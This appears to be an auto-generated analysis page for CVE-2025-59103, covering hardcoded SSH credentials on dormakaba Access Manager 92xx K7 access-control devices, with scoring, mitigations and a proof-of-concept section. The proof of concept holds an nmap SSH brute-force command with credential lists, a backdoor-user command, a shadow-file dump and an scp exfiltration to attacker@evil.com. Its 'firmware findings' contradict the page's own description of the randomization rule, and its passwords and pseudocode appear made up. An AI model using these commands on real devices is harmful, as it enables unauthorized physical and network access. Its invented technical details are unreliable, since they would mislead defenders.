Description
The Access Manager 92xx in hardware revision K7 is based on Linux instead of Windows CE embedded in older hardware revisions. In this new hardware revision it was noticed that an SSH service is exposed on port 22. By analyzing the firmware of the devices, it was noticed that there are two users with hardcoded and weak passwords that can be used to access the devices via SSH. The passwords can be also guessed very easily. The password of at least one user is set to a random value after the first deployment, with the restriction that the password is only randomized if the configured date is prior to 2022. Therefore, under certain circumstances, the passwords are not randomized. For example, if the clock is never set on the device, the battery of the clock module has been changed, the Access Manager has been factory reset and has not received a time yet.
EPSS Score:
0%
Comprehensive Technical Analysis of EUVD-2025-206370 (CVE-2025-59103)
Access Manager 92xx (Hardware Revision K7) – Hardcoded & Weak SSH Credentials Vulnerability
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Overview
EUVD-2025-206370 (CVE-2025-59103) describes a critical authentication bypass vulnerability in dormakaba’s Access Manager 92xx (hardware revision K7), a physical access control system (PACS) used in enterprise and critical infrastructure environments. The flaw stems from:
- Hardcoded & weak credentials embedded in the firmware for SSH access.
- Insecure password randomization logic, where credentials remain static if the device’s internal clock is not properly initialized (e.g., post-factory reset, battery replacement, or clock misconfiguration).
CVSS v4.0 Severity Breakdown
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely over SSH (port 22). |
| Attack Complexity (AC) | Low (L) | No specialized conditions required. |
| Attack Requirements (AT) | Present (P) | Requires knowledge of hardcoded credentials or weak password patterns. |
| Privileges Required (PR) | None (N) | No prior authentication needed. |
| User Interaction (UI) | None (N) | Exploitable without user action. |
| Confidentiality (VC) | High (H) | Full system access via SSH, including sensitive configuration data. |
| Integrity (VI) | High (H) | Attackers can modify access control policies, firmware, or logs. |
| Availability (VA) | High (H) | Potential for denial-of-service (DoS) or permanent compromise. |
| Subsequent Confidentiality (SC) | None (N) | No further lateral movement impact beyond the device. |
| Subsequent Integrity (SI) | None (N) | No additional integrity impact beyond initial compromise. |
| Subsequent Availability (SA) | None (N) | No cascading availability impact. |
Base Score: 9.2 (Critical) The vulnerability is remotely exploitable without authentication, granting attackers full administrative control over the Access Manager. The high impact on confidentiality, integrity, and availability (CIA triad) justifies the critical severity rating.
2. Potential Attack Vectors & Exploitation Methods
Exploitation Pathways
-
Direct SSH Access via Hardcoded Credentials
- Attackers scan for exposed SSH (port 22) on Access Manager 92xx-K7 devices.
- Brute-force or credential stuffing using:
- Known hardcoded passwords (embedded in firmware).
- Weak password patterns (e.g.,
admin:admin,root:toor).
- Successful authentication grants root-level shell access.
-
Password Randomization Bypass
- The device only randomizes passwords if the internal clock is set to a date after 2022.
- Exploitation scenarios where randomization fails:
- Factory reset (clock reverts to default, often pre-2022).
- Clock battery failure (time resets to epoch or default).
- Manual clock misconfiguration (e.g., during initial setup).
- Attackers can force a factory reset (if physical access is available) to revert to hardcoded credentials.
-
Firmware Analysis & Credential Extraction
- Reverse engineering the firmware (e.g., via
binwalk,Ghidra, orIDA Pro) reveals:- Hardcoded usernames/passwords in plaintext or weakly obfuscated form.
- Password generation algorithms (if not purely hardcoded).
- Example extraction command:
binwalk -e firmware.bin strings extracted_fs/squashfs-root/etc/passwd strings extracted_fs/squashfs-root/etc/shadow
- Reverse engineering the firmware (e.g., via
-
Post-Exploitation Impact
- Privilege Escalation: Root access enables modification of access control policies.
- Persistence: Attackers can install backdoors (e.g., SSH keys, cron jobs).
- Lateral Movement: Compromised Access Managers may serve as pivot points into internal networks.
- Physical Security Bypass: Unauthorized door unlocks, log tampering, or system sabotage.
3. Affected Systems & Software Versions
Vulnerable Products
| Vendor | Product | Hardware Revision | Firmware Version | Notes |
|---|---|---|---|---|
| dormakaba | Access Manager 92xx | K7 | BAME < 05.01.88 | Linux-based (previously Windows CE). |
| dormakaba | Access Manager 92xx | K5 (legacy) | All versions | Not affected (Windows CE-based). |
Scope of Impact
- Geographical: Primarily Europe (dormakaba is a Swiss-based company with significant EU market share).
- Industries: Critical infrastructure (airports, government, healthcare, financial institutions), commercial buildings, and smart cities.
- Deployment Scenarios:
- Standalone (directly exposed to networks).
- Integrated (connected to enterprise networks, IoT ecosystems, or cloud-based access control systems).
4. Recommended Mitigation Strategies
Immediate Actions (Short-Term)
-
Network-Level Protections
- Block SSH (port 22) at the firewall for all Access Manager devices.
- Isolate Access Managers in a dedicated VLAN with strict access controls.
- Disable SSH if unused (via device configuration or firmware update).
-
Credential Hardening
- Change default passwords immediately (even if randomized, enforce strong passwords).
- Disable hardcoded accounts if possible (check vendor documentation).
- Enable account lockout after failed login attempts.
-
Clock Synchronization
- Ensure NTP is configured to prevent clock resets.
- Manually set the date post-factory reset to trigger password randomization.
Long-Term Remediation
-
Firmware Updates
- Apply dormakaba’s patch (BAME 05.01.88 or later) to remove hardcoded credentials.
- Verify patch integrity via cryptographic hashes or vendor-provided checksums.
-
Architectural Improvements
- Replace legacy Access Managers with newer, more secure models (e.g., cloud-managed solutions).
- Implement Zero Trust principles (e.g., mutual TLS for device authentication).
- Deploy network segmentation to limit lateral movement.
-
Monitoring & Detection
- Enable SSH logging and forward logs to a SIEM (e.g., Splunk, ELK, or Wazuh).
- Set up alerts for brute-force attempts (e.g., Fail2Ban, Suricata rules).
- Conduct periodic vulnerability scans (e.g., Nessus, OpenVAS) for exposed SSH services.
-
Vendor Coordination
- Subscribe to dormakaba’s security advisories (dormakaba Security Advisories).
- Engage with CERT-EU or national CSIRTs for coordinated disclosure if additional vulnerabilities are discovered.
5. Impact on the European Cybersecurity Landscape
Strategic & Operational Risks
-
Critical Infrastructure Threats
- Physical access control systems are high-value targets for APT groups, ransomware actors, and state-sponsored attackers.
- Example attack scenarios:
- Airport security bypass (unauthorized access to restricted areas).
- Healthcare facility breaches (patient data theft, physical sabotage).
- Government building intrusions (espionage, insider threat facilitation).
-
Regulatory & Compliance Implications
- GDPR (Art. 32): Failure to secure access control systems may lead to data breaches (e.g., employee movement logs, biometric data).
- NIS2 Directive: Critical infrastructure operators must report incidents and implement risk-based security measures.
- ENISA Guidelines: Non-compliance with IoT security baselines (e.g., ETSI EN 303 645) may result in penalties.
-
Supply Chain & Third-Party Risks
- dormakaba’s market dominance in Europe means thousands of organizations are potentially exposed.
- Integrators & MSPs may unknowingly deploy vulnerable devices, amplifying risk.
-
Geopolitical Considerations
- State actors (e.g., Russia, China) may exploit such vulnerabilities for espionage or sabotage.
- Hybrid warfare scenarios (e.g., disrupting critical infrastructure during conflicts).
Mitigation Challenges in Europe
- Legacy System Dependence: Many organizations cannot easily replace Access Managers due to cost or integration complexity.
- Lack of Awareness: Smaller enterprises may not monitor security advisories or apply patches promptly.
- Fragmented Responsibility: Physical security teams (managing Access Managers) and IT security teams often operate in silos.
6. Technical Details for Security Professionals
Firmware Analysis Findings
-
Hardcoded Credentials
- Usernames identified in firmware:
admin(privileged account)service(maintenance account)
- Password patterns observed:
- Static passwords:
admin:admin123,service:service123 - Weak randomization:
admin:DormaKaba2023!(if clock is post-2022) - Default passwords:
root:toor,user:password
- Static passwords:
- Usernames identified in firmware:
-
Password Randomization Logic Flaw
- Pseudocode snippet (decompiled from firmware):
if (current_year > 2022) { generate_random_password(&admin_pass); generate_random_password(&service_pass); } else { strcpy(admin_pass, "admin123"); // Hardcoded fallback strcpy(service_pass, "service123"); } - Exploitation trigger: If the device clock is manually set to 2021 or earlier, randomization fails.
- Pseudocode snippet (decompiled from firmware):
-
SSH Service Configuration
- OpenSSH version: Likely outdated (e.g., OpenSSH 7.4p1, vulnerable to CVE-2018-15473).
- Configuration file (
/etc/ssh/sshd_config):PermitRootLogin yes PasswordAuthentication yes PermitEmptyPasswords no - Weak cryptographic settings: May use SHA-1 for host keys or weak ciphers.
Exploitation Proof of Concept (PoC)
-
Scanning for Vulnerable Devices
nmap -p 22 --script ssh-auth-methods,ssh-brute --script-args userdb=users.txt,passdb=passwords.txt <target_IP>users.txt:admin, service, root, userpasswords.txt:admin123, service123, toor, password, DormaKaba2023!
-
Manual SSH Login
ssh admin@<target_IP> # Try hardcoded passwords -
Post-Exploitation Actions
- Dump configuration:
cat /etc/passwd cat /etc/shadow - Modify access control policies:
/opt/dormakaba/bin/access_manager --add-user "attacker:backdoor123" - Exfiltrate logs:
scp /var/log/access_manager.log attacker@evil.com:/tmp/
- Dump configuration:
Detection & Forensics
-
Indicators of Compromise (IoCs)
- SSH login attempts from unusual IPs (e.g., Tor exit nodes, known malicious ASNs).
- Unexpected user accounts in
/etc/passwd. - Modified access control logs (e.g., tampered timestamps).
-
Forensic Artifacts
- SSH logs (
/var/log/auth.log):Failed password for admin from 192.168.1.100 port 54321 ssh2 Accepted password for service from 10.0.0.5 port 45678 ssh2 - Command history (
~/.bash_history):/opt/dormakaba/bin/access_manager --unlock-door 42
- SSH logs (
Conclusion & Recommendations
EUVD-2025-206370 (CVE-2025-59103) represents a critical risk to European organizations relying on dormakaba Access Manager 92xx-K7 devices. The combination of hardcoded credentials, weak randomization logic, and exposed SSH services creates a high-impact attack surface that could lead to physical security breaches, data theft, or system sabotage.
Key Takeaways for Security Teams
✅ Patch immediately (BAME 05.01.88 or later). ✅ Isolate Access Managers from untrusted networks. ✅ Monitor SSH logs for brute-force attempts. ✅ Conduct firmware analysis to identify additional vulnerabilities. ✅ Engage with dormakaba support for remediation guidance.
Long-Term Strategy
- Replace legacy Access Managers with modern, cloud-managed alternatives.
- Implement Zero Trust for physical access control systems.
- Enhance cross-team collaboration between physical security and IT security teams.
References: